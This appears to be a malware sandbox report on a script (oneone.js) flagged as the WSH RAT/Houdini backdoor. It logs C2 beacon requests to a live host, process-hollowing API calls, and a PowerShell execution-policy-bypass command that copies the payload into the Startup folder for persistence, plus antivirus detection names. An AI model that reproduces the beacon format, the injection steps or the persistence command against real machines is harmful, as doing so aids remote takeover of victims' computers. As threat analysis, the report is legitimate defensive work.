send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 420 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 644 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 424 sent: 342	1	342
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
InternetCrackUrlW Oct. 19, 2023, 9:33 a.m.	url: http://chongmei33.publicvm.com:7045/is-ready flags: 0	1	1
HttpOpenRequestW Oct. 19, 2023, 9:33 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send Oct. 19, 2023, 9:33 a.m.	buffer: ! socket: 1176 sent: 1	1	1
send Oct. 19, 2023, 9:33 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 19/10/2023\|JavaScript-v2.0\|KR:South Korea Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 420 sent: 342	1	342

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2852 called NtSetContextThread to modify thread in remote process 3040
NtSetContextThread Oct. 19, 2023, 9:33 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4446510 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 3040	1	0	0

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\Output.js
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\Output.js"
parent_process	wscript.exe	martian_process	C:\Users\test22\AppData\Local\Temp\vOb.exe
parent_process	wscript.exe	martian_process	"C:\Users\test22\AppData\Local\Temp\vOb.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2852 resumed a thread in remote process 3040
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 3040	1	0	0

Creates a suspicious Powershell process (1 event)

option

-executionpolicy bypass

value

Attempts to bypass execution policy

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (28 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 19, 2023, 9:32 a.m.	thread_identifier: 2688 thread_handle: 0x00000370 process_identifier: 2684 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\wscript.exe track: 1 command_line: "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\Output.js" filepath_r: C:\Windows\System32\WScript.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000364	1	1
CreateProcessInternalW Oct. 19, 2023, 9:33 a.m.	thread_identifier: 2856 thread_handle: 0x0000036c process_identifier: 2852 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\vOb.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\vOb.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\vOb.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000374	1	1
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2852	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2852	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2852	1	0
CreateProcessInternalW Oct. 19, 2023, 9:33 a.m.	thread_identifier: 2964 thread_handle: 0x0000025c process_identifier: 2960 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "Powershell.exe" -ExecutionPolicy Bypass -command xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENmFl3GsolqcGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaecB8P/FVecfW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/F68/W3GXggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD4IjJQmV1gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4oTy+f+VDOiQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZYnnZc0VCbJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjlaVQk75pkxpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd5227aIGAKGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818= 'C:\Users\test22\AppData\Local\Temp\vOb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows Audio.exe' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000264	1	1
CreateProcessInternalW Oct. 19, 2023, 9:33 a.m.	thread_identifier: 3044 thread_handle: 0x0000025c process_identifier: 3040 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vOb.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\vOb.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\vOb.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000026c	1	1
NtGetContextThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x0000025c	1	0
NtAllocateVirtualMemory Oct. 19, 2023, 9:33 a.m.	process_identifier: 3040 region_size: 270336 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000026c	1	0
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELä,eàº.Ù à@ @ÔØWàF H.text4¹ º `.rsrcFà¼@@.relocÂ@B base_address: 0x00400000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: base_address: 0x00402000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: P8h à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalName1e9bd1a1-0255-447f-9c56-5c2d543f960b.exe(LegalCopyright \|)OriginalFilename1e9bd1a1-0255-447f-9c56-5c2d543f960b.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0ï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043e000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: Ð09 base_address: 0x00440000 process_identifier: 3040 process_handle: 0x0000026c	1	1
WriteProcessMemory Oct. 19, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3040 process_handle: 0x0000026c	1	1
NtSetContextThread Oct. 19, 2023, 9:33 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4446510 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2960	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2960	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2960	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 2960	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000168 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000284 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000398 suspend_count: 1 process_identifier: 3040	1	0
NtResumeThread Oct. 19, 2023, 9:33 a.m.	thread_handle: 0x00000514 suspend_count: 1 process_identifier: 3040	1	0

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

DrWeb	JS.Spy.16
ClamAV	Txt.Packed.Cryxos-7111887-0
CAT-QuickHeal	VBS.Agent.34768
Skyhigh	BehavesLike.JS.Downloader.bm
ALYac	Backdoor.MSIL.Agent.IU
Sangfor	Trojan.Generic-JS.Save.OnlyJS
Arcabit	JS:Trojan.Cryxos.DE4E [many]
Symantec	Trojan Horse
ESET-NOD32	JS/Vjworm.CD
Avast	JS:ADODB-BL [Expl]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Worm.Script.Dinihou.gen
BitDefender	JS:Trojan.Cryxos.3662
NANO-Antivirus	Trojan.Script.Dropper.foxxbq
MicroWorld-eScan	JS:Trojan.Cryxos.3662
Emsisoft	JS:Trojan.Cryxos.3662 (B)
F-Secure	Malware.HTML/ExpKit.Gen2
VIPRE	JS:Trojan.Cryxos.3662
TrendMicro	HEUR_JSRANSOM.O4
FireEye	JS:Trojan.Cryxos.3662
Sophos	JS/Vjworm-Y
Ikarus	Worm.JS.Vjworm
Google	Detected
Avira	HTML/ExpKit.Gen2
Kingsoft	Script.Ks.Malware.9344
Xcitium	Worm.JS.Vjworm.AK@8cyo73
Microsoft	Trojan:VBS/Irsaz.B
ZoneAlarm	HEUR:Worm.Script.Dinihou.gen
GData	Script.Backdoor.WSHRAT.B
Varist	JS/Worm.D
McAfee	VBS/Autorun.worm.aaha
Rising	Backdoor.Houdini/JS!1.C2BA (CLASSIC)
MAX	malware (ai score=88)
AVG	JS:ADODB-BL [Expl]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Users\test22\AppData\Local\Temp\vOb.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

oneone.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All